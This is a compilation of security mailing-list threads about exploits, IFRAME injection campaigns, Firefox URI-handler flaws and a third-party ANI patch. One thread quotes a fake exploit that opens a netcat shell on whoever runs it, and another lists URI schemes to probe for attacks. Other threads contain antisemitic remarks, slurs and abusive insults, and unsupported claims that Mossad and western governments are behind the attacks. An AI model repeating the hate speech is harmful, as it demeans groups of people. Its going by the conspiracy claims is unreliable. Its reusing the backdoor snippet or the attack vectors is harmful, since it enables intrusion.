[Full-disclosure] More on exploiting glibc __tzfile_read integer overflow to buffer overflow and vsftpd
More on exploiting glibc __tzfile_read integer overflow to buffer overflow and vsftpd
http://rcvalle.com/post/14261796328/more-on-exploiting-glibc-tzfile-read-integer-overflow

--
Ramon de C Valle / Red Hat Security Response Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More on IPv6 RA-Guard evasion (IPv6 security)
Folks,

We have posted on the SI6 Networks blog more information about IPv6 RA-Guard evasion, including pointers to the recent presentations at IETF 81. The post is available at:
http://blog.si6networks.com/2011/09/router-advertisement-guard-ra-guard.html

P.S.: In case you haven't, you may want to join the IPv6 Hackers mailing-list:
http://www.si6networks.com/community/mailing-lists.html

Thanks!

Best regards,
--
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
web: http://www.si6networks.com
[Full-disclosure] more on that
And this is what I'm talking about:
http://seclists.org/fulldisclosure/2005/Apr/412
Re: [Full-disclosure] more on that
So you're whining about a 4-year-old post? lol

And who uses an exploit without changing the shellcode anyway?

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Tyler Durten
Sent: 24. november 2009 22:42
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] more on that

And this is what I'm talking about:
http://seclists.org/fulldisclosure/2005/Apr/412
Re: [Full-disclosure] more on that
On 24 Nov 2009, at 13:41, Tyler Durten wrote:
> And this is what I'm talking about:
> http://seclists.org/fulldisclosure/2005/Apr/412

... which reads, in part:

    main() {
        //Section Initialises designs implemented by mexicans
        //Imigrate
        system(launcher);
        system(netcat_shell);
        system(shellcode);

I can understand possibly overlooking something clever (like a fake exploit that buffer-overflows itself), but this isn't even marginally subtle.
Re: [Full-disclosure] more on that
Well, all that really depends on the theory that the OP actually read it prior to executing it.

2009/11/26 Andrew Farmer andf...@gmail.com
> On 24 Nov 2009, at 13:41, Tyler Durten wrote:
>> And this is what I'm talking about:
>> http://seclists.org/fulldisclosure/2005/Apr/412
>
> ... which reads, in part:
>
>     main() {
>         //Section Initialises designs implemented by mexicans
>         //Imigrate
>         system(launcher);
>         system(netcat_shell);
>         system(shellcode);
>
> I can understand possibly overlooking something clever (like a fake exploit that buffer-overflows itself), but this isn't even marginally subtle.
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
You're like a shite that won't flush away.

On Tue, Dec 2, 2008 at 6:11 PM, Ureleet [EMAIL PROTECTED] wrote:
> all speculation: no 1 knows 4 sure.
>
> http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss
> http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/
> http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm
>
> c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention.
>
> On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote:
>> 2008/12/2 Ureleet [EMAIL PROTECTED]
>>> u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can access any windows system regardless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention.
>>
>> I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement?
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
pot kettle black

On Wed, Dec 3, 2008 at 3:34 AM, n3td3v [EMAIL PROTECTED] wrote:
> You're like a shite that won't flush away.
>
> On Tue, Dec 2, 2008 at 6:11 PM, Ureleet [EMAIL PROTECTED] wrote:
>> all speculation: no 1 knows 4 sure.
>>
>> http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss
>> http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/
>> http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm
>>
>> c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention.
>>
>> On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote:
>>> 2008/12/2 Ureleet [EMAIL PROTECTED]
>>>> u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can access any windows system regardless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention.
>>>
>>> I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement?
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
If there's a piece of shit around here that should be flushed, it's only you n3tcr4p. No one likes you, get the fuck back on your kiddie mailing list/group.

2008/12/3 n3td3v [EMAIL PROTECTED]
> You're like a shite that won't flush away.
>
> On Tue, Dec 2, 2008 at 6:11 PM, Ureleet [EMAIL PROTECTED] wrote:
>> all speculation: no 1 knows 4 sure.
>>
>> http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss
>> http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/
>> http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm
>>
>> c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention.
>>
>> On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote:
>>> 2008/12/2 Ureleet [EMAIL PROTECTED]
>>>> u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can access any windows system regardless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention.
>>>
>>> I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement?
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
There are no kiddies on the group and any that appear get banned.

On Wed, Dec 3, 2008 at 4:28 PM, j-f sentier [EMAIL PROTECTED] wrote:
> If there's a piece of shit around here that should be flushed, it's only you n3tcr4p. No one likes you, get the fuck back on your kiddie mailing list/group.
>
> 2008/12/3 n3td3v [EMAIL PROTECTED]
>> You're like a shite that won't flush away.
>>
>> On Tue, Dec 2, 2008 at 6:11 PM, Ureleet [EMAIL PROTECTED] wrote:
>>> all speculation: no 1 knows 4 sure.
>>>
>>> http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss
>>> http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/
>>> http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm
>>>
>>> c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention.
>>>
>>> On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote:
>>>> 2008/12/2 Ureleet [EMAIL PROTECTED]
>>>>> u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can access any windows system regardless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention.
>>>>
>>>> I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement?
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
all speculation: no 1 knows 4 sure.

http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss
http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/
http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm

c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention.

On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote:
> 2008/12/2 Ureleet [EMAIL PROTECTED]
>> u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can access any windows system regardless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention.
>
> I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement?
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
If they use zero-day exploits then that's illegal. Secondly, are they using zero-day exploits posted on public mailing lists or using their own home grown exploits that the bad guys and potentially the vendor don't know about?

On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray [EMAIL PROTECTED] wrote:
> proof, did you read the article ? They are after your bad guys and probably using zero day exploits !?
>
> On Mon, Dec 1, 2008 at 9:13 PM, n3td3v [EMAIL PROTECTED] wrote:
>> http://news.bbc.co.uk/1/hi/technology/7758127.stm
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
Which court order? Post a link.

On Mon, Dec 1, 2008 at 11:27 PM, Aaron Gray [EMAIL PROTECTED] wrote:
> Probably not with a court order.
>
> On Mon, Dec 1, 2008 at 10:51 PM, n3td3v [EMAIL PROTECTED] wrote:
>> If they use zero-day exploits then that's illegal. Secondly, are they using zero-day exploits posted on public mailing lists or using their own home grown exploits that the bad guys and potentially the vendor don't know about?
>>
>> On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray [EMAIL PROTECTED] wrote:
>>> proof, did you read the article ? They are after your bad guys and probably using zero day exploits !?
>>>
>>> On Mon, Dec 1, 2008 at 9:13 PM, n3td3v [EMAIL PROTECTED] wrote:
>>>> http://news.bbc.co.uk/1/hi/technology/7758127.stm
Re: [Full-disclosure] more rehashes of xss 'evil gif'
Clearly this class of vulnerabilities is nothing short of epic, entirely new, and truly worth our time and fear. When combined with the stellar research and presentation skills of said researchers it meets 3/4 requirements for widespread media cuntbaggery, observe:

1) words that sound new and cool
   --The attack relies on a new type of hybrid file
   hybrid: hybrid, hmm sort of hydra, sort of like internet super worm of doom??!! watchout!

2) social networking sites
   --giving the bad guys access to the victim's Facebook account.
   zomgz did someone say facebook? watch out, your teenage whore daughter is now at risk!

3) moderately not clever acronym
   --They call this type of file a GIFAR, a contraction of GIF and JAR
   plus it sounds like some sort of mythical beast?! GIFAR, ROAR! do you think they'll have a cool animation for it on their slides? one can only dream!

wait, what about the 4th requirement? how about the possibility of anyone actually being owned? wait, no.

On Tue, Aug 5, 2008 at 1:26 AM, Robert Holgstad [EMAIL PROTECTED] wrote:
> http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html
>
> seems dan isn't the only press whore around! rebouncing from his embarrassing post about 'deputy dan' and the matasano blog - whoosh anyone?
>
> nate and his crew of javascript gurus have whipped up another rehash of an old class of bugs that has been used in the wild for a long time. we personally want to thank nate for his great work he's done for conferences over the years filling up their talking spots with useless crap. his work is only rivaled by gadi evron who gets accepted to every conference because declining a fat AND jewish person is guaranteed to get 1000s of big nosed ambulance chasers after you by the end of business day.
>
> once again we would like to thank nate for his cutting edge research and hopefully he will get nommed for next year's pwnie lifetime achievement award!
Re: [Full-disclosure] more rehashes of xss 'evil gif'
On Tue, Aug 5, 2008 at 6:26 AM, Robert Holgstad [EMAIL PROTECTED] wrote:
> http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html
>
> seems dan isn't the only press whore around! rebouncing from his embarrassing post about 'deputy dan' and the matasano blog - whoosh anyone?
>
> nate and his crew of javascript gurus have whipped up another rehash of an old class of bugs that has been used in the wild for a long time. we personally want to thank nate for his great work he's done for conferences over the years filling up their talking spots with useless crap. his work is only rivaled by gadi evron who gets accepted to every conference because declining a fat AND jewish person is guaranteed to get 1000s of big nosed ambulance chasers after you by the end of business day.
>
> once again we would like to thank nate for his cutting edge research and hopefully he will get nommed for next year's pwnie lifetime achievement award!

Don't forget Funsec is run by Mossad and that all the silly people on that list who post on it don't realise what intelligence organization they are contributing to. Of course there is no publicly available information to prove Gadi Evron has connections with Mossad, but I personally assume it's probably the case.

All the best,
n3td3v
[Full-disclosure] more rehashes of xss 'evil gif'
http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html

seems dan isn't the only press whore around! rebouncing from his embarrassing post about 'deputy dan' and the matasano blog - whoosh anyone?

nate and his crew of javascript gurus have whipped up another rehash of an old class of bugs that has been used in the wild for a long time. we personally want to thank nate for his great work he's done for conferences over the years filling up their talking spots with useless crap. his work is only rivaled by gadi evron who gets accepted to every conference because declining a fat AND jewish person is guaranteed to get 1000s of big nosed ambulance chasers after you by the end of business day.

once again we would like to thank nate for his cutting edge research and hopefully he will get nommed for next year's pwnie lifetime achievement award!
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Mon, Mar 17, 2008 at 8:35 PM, [EMAIL PROTECTED] wrote:
> On Sat, 15 Mar 2008 08:44:29 -, worried security said:
>> i call government involvement...
>> worried if u are a government who wants an attack highly known about do you A) attack some random blog, or b) attack high profile news website?
>
> lots of rambling deleted
>
> Have you considered the possibility that it's actually the RBN or similar, making it *look* like a government is involved?

ah, so you're not denying it does look like a government is involved?;) you've just made my day, week, year etc.

sans institute, i've been mailing you all weekend and now a respected member of the security community has flagged it as well. all the best with that institute thingy.
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Tue, Mar 18, 2008 at 1:06 AM, [EMAIL PROTECTED] wrote:
> On Mon, 17 Mar 2008 21:35:03 -, you said:
>>> Have you considered the possibility that it's actually the RBN or similar, making it *look* like a government is involved?
>>
>> ah, so you're not denying it does look like a government is involved?;) you've just made my day, week, year etc.
>
> Just because some people look at a large-scale, well-funded, organized effort and think government because that's all they can think of doesn't make it so. There are many organized crime syndicates in this world that have larger annual budgets than many countries' total governmental budgets. Whether such organizations qualify as de facto governments in the areas they control is a question best left to the political scientists

are you telling me RBN isn't protected by FSB? *a government*

RBN and FSB have no political motivation to make an online attack look like it's coming from China just for the sake of tricking the public into thinking China is a major online threat to society. however, western super powers do.

whoever is behind this wanted more than gaming passwords, they wanted the attack highly investigated and known about, we can only speculate why.

i looked at the bloggers picture and thought *i don't trust this guy, he's got that look about him*.
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Sat, 15 Mar 2008 08:44:29 -, worried security said:
> i call government involvement...
> worried if u are a government who wants an attack highly known about do you A) attack some random blog, or b) attack high profile news website?

lots of rambling deleted

Have you considered the possibility that it's actually the RBN or similar, making it *look* like a government is involved? Given that the RBN crew probably knows more about hacking for fun and profit than most governments
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Mon, 17 Mar 2008 21:35:03 -, you said:
>> Have you considered the possibility that it's actually the RBN or similar, making it *look* like a government is involved?
>
> ah, so you're not denying it does look like a government is involved?;) you've just made my day, week, year etc.

Just because some people look at a large-scale, well-funded, organized effort and think government because that's all they can think of doesn't make it so. There are many organized crime syndicates in this world that have larger annual budgets than many countries' total governmental budgets. Whether such organizations qualify as de facto governments in the areas they control is a question best left to the political scientists
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Wed, Mar 12, 2008 at 2:51 PM, Dancho Danchev [EMAIL PROTECTED] wrote:
> The ongoing monitoring of this campaign reveals that the group is continuing to expand the campaign, introducing over a hundred new bogus .info domains acting as traffic redirection points to the campaigns hardcoded within the secondary redirection point, in this case radt.info where a new malware variant of Zlob is attempting to install through an ActiveX object.
>
> Sample domains targeted within the past 48 hours : lib.ncsu.edu; fulldownloads.us; cso.ie; dblife.cs.wisc.edu; www-history.mcs.st-andrews.ac.uk; ehawaii.gov; timeanddate.com; boisestate.edu; aoa.gov; gustavus.edu; archive.org; gsbapps.stanford.edu; bushtorrent.com; ccie.com; uvm.edu; thehipp.org; mnsu.edu; camajorityreport.com; medicare.gov; usamriid.army.mil
>
> http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html
>
> Regards
> --
> Dancho Danchev
> Cyber Threats Analyst/Blogger
> http://ddanchev.blogspot.com
> http://windowsecurity.com/Dancho_Danchev

i call government involvement...

<worried> if u are a government who wants an attack highly known about do you A) attack some random blog, or b) attack high profile news website?
<worried> if are a gov who wants an attack highly known about, written about by the biggest technology sites, and investigated by everybody who's interested in security
<worried> an unknown blog or a high profile news website
<worried> a normal hacker would not do what's been done
<worried> just to get some gay passwords
<worried> this is the gov with a political agenda
<worried> they're not normal hackers they are state sponsored or are the actual us-gov
<worried> normal hackers who want passwords do not hack cnet asia, they want their attack to be unfound as long as possible
<worried> a normal hacker would not do what's been done
<worried> just to get some gay passwords for world of warcraft
<worried> why would a normal hacker who just wants a few gaming passwords hack a news site ?
<worried> i would not want the media's attention or the global security research community knowing what i was doing, i would at all costs do everything possible to make sure news websites like cnet did not get infected
<cryptowave> i've just spent the last several hours doing malware analysis that links back to china
<worried> americans would make an attack link back to china
<cryptowave> well, they are pretty convincing when every thing points back to china
<cryptowave> domains registered there, ip located there, code with chinese
<cryptowave> and they used chinese dollars to register the domains?
<cryptowave> and used chinese email addresses too
<worried> yes, all bases would be covered
<worried> proper gov hackers know ppl like u are going to check details like that
<worried> they put it on a high profile technology news website to make sure the attack was covered by internet news and the thing they wanted the security experts to find is the chinese connection
<cryptowave> you don't need to write your code in chinese, register your domains via chinese registrars, use a chinese email address, etc
<worried> western government hackers or western state sponsored hackers would go that far to convince everyone.
<cryptowave> worried: you're jumping to conclusions ;)
<worried> whoever is behind this wanted the attack to be known about and investigated with the core objective that the blame is on china
<worried> and funnily enough the western gov world has a political agenda on that very topic right now, coincidence?
<worried> the fact cnet asia, trend micro was hacked makes me highly suspicious of government involvement, normal hackers who just want a few gay gaming passwords, they would be the last people they would hack.
<worried> this is political, this is done by the government to further bring public notice about chinese hackers as a pretext to ramp up the need for cyber commands, convince the whitehouse about offensive cyber security funding etc etc and the joe average middle american who don't know anything about the internet.

these are my conspiracy theories, good bye dancho. what i say is probably bullshit, but you've got to wonder why the high profile sites, especially the biggest technology journalist site and anti virus site was hacked, why would a normal hacker do this for gay passwords?, all the benefits and rewards from this would be a government wanting an attack investigated that links back to china. our supposed number one cyber enemy, according to western super powers. they hacked cnet asia to make sure the asian news were covering the attack as well, to make sure the eventual finding of the china link was known by the public in asia as well. there is more to this than meets the eye of just normal hackers trying to get passwords, because of the type of the first websites which were hacked. a government here is wanting maximum publicity, that's not something small time hackers trying to get world of warcraft passwords want. there is a political game
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
I love the way whenever anything happens, someone always assumes it's some big conspiracy.

--
razi

On 3/15/08, worried security [EMAIL PROTECTED] wrote:
> On Wed, Mar 12, 2008 at 2:51 PM, Dancho Danchev [EMAIL PROTECTED] wrote:
>> The ongoing monitoring of this campaign reveals that the group is continuing to expand the campaign, introducing over a hundred new bogus .info domains acting as traffic redirection points to the campaigns hardcoded within the secondary redirection point, in this case radt.info where a new malware variant of Zlob is attempting to install through an ActiveX object.
>>
>> Sample domains targeted within the past 48 hours : lib.ncsu.edu; fulldownloads.us; cso.ie; dblife.cs.wisc.edu; www-history.mcs.st-andrews.ac.uk; ehawaii.gov; timeanddate.com; boisestate.edu; aoa.gov; gustavus.edu; archive.org; gsbapps.stanford.edu; bushtorrent.com; ccie.com; uvm.edu; thehipp.org; mnsu.edu; camajorityreport.com; medicare.gov; usamriid.army.mil
>>
>> http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html
>>
>> Regards
>> --
>> Dancho Danchev
>> Cyber Threats Analyst/Blogger
>> http://ddanchev.blogspot.com
>> http://windowsecurity.com/Dancho_Danchev
>
> i call government involvement...
>
> <worried> if u are a government who wants an attack highly known about do you A) attack some random blog, or b) attack high profile news website?
> <worried> if are a gov who wants an attack highly known about, written about by the biggest technology sites, and investigated by everybody who's interested in security
> <worried> an unknown blog or a high profile news website
> <worried> a normal hacker would not do what's been done
> <worried> just to get some gay passwords
> <worried> this is the gov with a political agenda
> <worried> they're not normal hackers they are state sponsored or are the actual us-gov
> <worried> normal hackers who want passwords do not hack cnet asia, they want their attack to be unfound as long as possible
> <worried> a normal hacker would not do what's been done
> <worried> just to get some gay passwords for world of warcraft
> <worried> why would a normal hacker who just wants a few gaming passwords hack a news site ?
> <worried> i would not want the media's attention or the global security research community knowing what i was doing, i would at all costs do everything possible to make sure news websites like cnet did not get infected
> <cryptowave> i've just spent the last several hours doing malware analysis that links back to china
> <worried> americans would make an attack link back to china
> <cryptowave> well, they are pretty convincing when every thing points back to china
> <cryptowave> domains registered there, ip located there, code with chinese
> <cryptowave> and they used chinese dollars to register the domains?
> <cryptowave> and used chinese email addresses too
> <worried> yes, all bases would be covered
> <worried> proper gov hackers know ppl like u are going to check details like that
> <worried> they put it on a high profile technology news website to make sure the attack was covered by internet news and the thing they wanted the security experts to find is the chinese connection
> <cryptowave> you don't need to write your code in chinese, register your domains via chinese registrars, use a chinese email address, etc
> <worried> western government hackers or western state sponsored hackers would go that far to convince everyone.
> <cryptowave> worried: you're jumping to conclusions ;)
> <worried> whoever is behind this wanted the attack to be known about and investigated with the core objective that the blame is on china
> <worried> and funnily enough the western gov world has a political agenda on that very topic right now, coincidence?
> <worried> the fact cnet asia, trend micro was hacked makes me highly suspicious of government involvement, normal hackers who just want a few gay gaming passwords, they would be the last people they would hack.
> <worried> this is political, this is done by the government to further bring public notice about chinese hackers as a pretext to ramp up the need for cyber commands, convince the whitehouse about offensive cyber security funding etc etc and the joe average middle american who don't know anything about the internet.
>
> these are my conspiracy theories, good bye dancho. what i say is probably bullshit, but you've got to wonder why the high profile sites, especially the biggest technology journalist site and anti virus site was hacked, why would a normal hacker do this for gay passwords?, all the benefits and rewards from this would be a government wanting an attack investigated that links back to china. our supposed number one cyber enemy, according to western super powers. they hacked cnet asia to make sure the asian news were covering the attack as well, to make sure the eventual finding of the china link was known by the public in
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
ya, it's a political game being played by the gov agencies to pinpoint CHINA, where these issues are not covered by their law at all. I'm aware of lots of underground attacks where hackers were hired specially for this purpose, but due to gov involvement it's just a game, wait and watch

Taneja Vikas
http://www.annysoft.com

On 3/15/08, Razi Shaban [EMAIL PROTECTED] wrote:

I love the way whenever anything happens, someone always assumes it's some big conspiracy.

-- razi

On 3/15/08, worried security [EMAIL PROTECTED] wrote:

On Wed, Mar 12, 2008 at 2:51 PM, Dancho Danchev [EMAIL PROTECTED] wrote:

The ongoing monitoring of this campaign reveals that the group is continuing to expand the campaign, introducing over a hundred new bogus .info domains acting as traffic redirection points to the campaigns hardcoded within the secondary redirection point, in this case radt.info, where a new malware variant of Zlob is attempting to install through an ActiveX object.

Sample domains targeted within the past 48 hours: lib.ncsu.edu; fulldownloads.us; cso.ie; dblife.cs.wisc.edu; www-history.mcs.st-andrews.ac.uk; ehawaii.gov; timeanddate.com; boisestate.edu; aoa.gov; gustavus.edu; archive.org; gsbapps.stanford.edu; bushtorrent.com; ccie.com; uvm.edu; thehipp.org; mnsu.edu; camajorityreport.com; medicare.gov; usamriid.army.mil

http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html

Regards
-- Dancho Danchev
Cyber Threats Analyst/Blogger
http://ddanchev.blogspot.com
http://windowsecurity.com/Dancho_Danchev

i call government involvement...

worried: if u are a government who wants an attack highly known about, do you A) attack some random blog, or B) attack a high profile news website?
[Full-disclosure] More High Profile Sites IFRAME Injected
The ongoing monitoring of this campaign reveals that the group is continuing to expand the campaign, introducing over a hundred new bogus .info domains acting as traffic redirection points to the campaigns hardcoded within the secondary redirection point, in this case radt.info, where a new malware variant of Zlob is attempting to install through an ActiveX object.

Sample domains targeted within the past 48 hours: lib.ncsu.edu; fulldownloads.us; cso.ie; dblife.cs.wisc.edu; www-history.mcs.st-andrews.ac.uk; ehawaii.gov; timeanddate.com; boisestate.edu; aoa.gov; gustavus.edu; archive.org; gsbapps.stanford.edu; bushtorrent.com; ccie.com; uvm.edu; thehipp.org; mnsu.edu; camajorityreport.com; medicare.gov; usamriid.army.mil

http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html

Regards
-- Dancho Danchev
Cyber Threats Analyst/Blogger
http://ddanchev.blogspot.com
http://windowsecurity.com/Dancho_Danchev
[Full-disclosure] More CNET Sites Under IFRAME Attack
With the recent IFRAME injection attack targeting ZDNet Asia, by abusing the site's search engine caching capabilities in combination with the lack of input sanitization, several more CNET Networks' web properties besides ZDNet Asia, namely TV.com, News.com and MySimon.com, are currently getting targeted using the same technique to inject the IFRAMEs and have the sites cache and locally host the results.

The following assessment outlines the IPs and domains used in the IFRAMEs, the domains and IPs hosting the rogue anti-virus and anti-spyware applications, as well as the detection rates of the applications.

http://ddanchev.blogspot.com/2008/03/more-cnet-sites-under-iframe-attack.html

Regards
-- Dancho Danchev
Cyber Threats Analyst/Blogger
http://ddanchev.blogspot.com
http://windowsecurity.com/Dancho_Danchev
[Full-disclosure] more gobbles ..
Oh yes, please give much needed feedback on http://turkeychargen.blogspot.com .. GOBBLES need your support to calm these idiots down ..
[Full-disclosure] More URI Handling Vulnerabilities (FireFox Remote Command Execution)
Internet Explorer has received a lot of attention lately for the way it handles requests for external URIs. Nate and I have warned that IE isn't the only browser with URI handling issues. I've posted a PoC for remote command execution in Firefox (2.0.0.5), Netscape Navigator 9, and mozilla at:

http://xs-sniper.com/blog/2007/07/24/remote-command-execution-in-firefox-2005/

These specific examples are built for WinXP SP2 WITH NO OTHER EXTERNAL EMAIL programs installed. Users with Outlook, notes, or other external mail programs installed may have had their URI handlers modified by the external program.

Take some improperly registered URIs combined with a lack of sanitation by the browser and we've got problems. It's time to take another look at the URIs on your machine...

-- Billy (BK) Rios
http://www.xs-sniper.com
Re: [Full-disclosure] More URI Handling Vulnerabilities (FireFox Remote Command Execution)
These are also protocols recognized by firefox and acted upon. You are prompted about opening each with the applicable application. It would be interesting if anyone can do something with it as well:

htafile:
htmlfile:
asffile:
exefile:
urlfile:
etc

So far accepting the prompt doesn't invoke the application, just on quick testing though ;-)
Re: [Full-disclosure] More URI Handling Vulnerabilities (FireFox Remote Command Execution)
Billy Rios wrote:

I've posted a PoC for remote command execution in Firefox (2.0.0.5), Netscape Navigator 9, and mozilla at: http://xs-sniper.com/blog/2007/07/24/remote-command-execution-in-firefox-2005/ These specific examples are built for WinXP SP2 WITH NO OTHER EXTERNAL EMAIL programs installed. Users with Outlook, notes, or other external mail programs installed may have had their URI handlers modified by the external program.

You must also upgrade to IE7, the examples will not work with IE6.

You must have something registered to handle mailto: or Firefox won't even try. It doesn't matter what, though: IE7 appears to have introduced a change such that mailto:foo%00bar completely bypasses the registered protocol handler for mailto: (and a few other web protocols).

You can follow Mozilla's progress dealing with this issue at https://bugzilla.mozilla.org/show_bug.cgi?id=389580
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On 4/3/07, Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] [EMAIL PROTECTED] wrote:

And there's a patch for that Realtek already to go on the download site. (read the caveat section). So far all I've seen/heard is that one.

Yes, I forgot to mention the patch.

This is patching 7 graphics items not just the one. ...that's 6 more things the folks that throw at me from those Metasploit modules ;-)

And of the seven vulnerabilities, the .ANI vulnerability is the only one I'm aware of that's being actively exploited. Four of the vulnerabilities are local privilege escalations that, while dangerous, aren't quite as dangerous as the ANI problem.

While I agree that using the MS patch now that it's out is definitely recommended, I would argue that if the patch is causing problems that can't be worked around, using the ZERT patch in the meantime is definitely an option. And prior to the MS patch being released, the ZERT patch was a great resource to have out there.

-- Jason 'XenoPhage' Frisvold
[EMAIL PROTECTED]
http://blog.godshell.com
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On 4/3/07, Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] [EMAIL PROTECTED] wrote:

the community need that they are reacting to. Gadi and the crew work hard and have my respect for their efforts.

Agreed. Previous patches worked as advertised with no adverse side effects here.

If you are willing to evaluate the eEye patch, Zert's should be higher on your list as well since reportedly it works better than eEye's.

eEye's patch only protects from attacks outside of %systemroot%. If an attacker can place a vulnerable file within %systemroot%, all bets are off. ZERT's patch, on the other hand, protects regardless of where the file is located. It specifically prevents the stack overflow condition by blocking chunks larger than 36 bytes from being copied.

Regardless it's a moot point. The real patch is out. Install that one. It's on Windows update now.

ISC is reporting problems with the Microsoft patch. A problem with the Realtek HD Audio Control Panel has been confirmed and patched by Microsoft. Other problems have been reported but no additional information on them has been released at this point.

-- Jason 'XenoPhage' Frisvold
[EMAIL PROTECTED]
http://blog.godshell.com
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/

Including:
1. Technical information.
2. Why this patch was released when eeye already released a third party patch.

Has anyone actually checked what this patch does? Who are ZERT and ISOTF respectively (About ISOTF at http://www.isotf.org/?page_value=0 says a lot...)?

...or is this an April Fool's joke?

Cheers,
Stefan.
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On 4/3/07, Stefan Kelm [EMAIL PROTECTED] wrote:

Has anyone actually checked what this patch does? Who are ZERT and ISOTF respectively (About ISOTF at http://www.isotf.org/?page_value=0 says a lot...)? ...or is this an April Fool's joke?

The patch is 100% real and it is effective. I've seen it in action on testbeds. I can't claim to be an unbiased observer, as I helped some with the actual engineering process.

There's a list of team members available: http://www.isotf.org/zert/members.htm

ZERT includes a handful of the industry's most talented reverse engineering experts. You will know many of them if you follow security news regularly, and some of them whose names may not be familiar to you (like Michael Ligh and Gil Dabah) are nonetheless master craftsmen of the trade we call security engineering. If I were running a security department, I'd hire them.

You don't have to listen to me, though. For the cynics out there who are as comfortable vetting code yourself as listening to me (nothing wrong with that, either), there's source code in the downloadable ZIP. The code is missing for two components:

